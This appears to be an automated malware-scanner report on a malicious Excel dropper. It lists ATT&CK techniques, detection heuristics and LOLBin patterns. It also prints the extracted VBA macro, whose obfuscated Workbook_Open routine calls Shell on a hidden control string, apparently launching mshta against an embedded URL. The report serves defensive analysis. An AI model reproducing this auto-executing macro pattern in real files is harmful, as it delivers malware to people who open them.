MALICIOUS
270
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The critical OLE_VBA_SHELL heuristic indicates that the VBA macro executes a command using the Shell() function. The Workbook_Open macro specifically calls this function with a string that appears to be a URL, likely to download and execute a second-stage payload. The presence of the mshta.exe reference further supports the execution of external content.
Heuristics 8
-
ClamAV: Xls.Dropper.Agent-7577352-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-7577352-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Static Function LDTyBEISFcBNzRfA() As String Call VBA.Shell(UserForm1.Image1.ControlTipText) End Function -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Option Explicit Sub WOrKboOK_opEN(): Call LDTyBEISFcBNzRfA: End Sub Static Function LDTyBEISFcBNzRfA() As String -
Reference to mshta.exe high SC_STR_MSHTAReference to mshta.exe
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://fajr.com/scal In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1128 bytes |
SHA-256: f70796d2b5ef4a214c880f271c97f0f703e50a07062cc6e3e91a1c45f7578539 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Sub WOrKboOK_opEN(): Call LDTyBEISFcBNzRfA: End Sub
Static Function LDTyBEISFcBNzRfA() As String
Call VBA.Shell(UserForm1.Image1.ControlTipText)
End Function
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{BEDF1C59-E8BE-4CAB-A439-37286B02AF49}{AD38D2AC-8BE5-4A18-A4DE-78B8E07D002C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.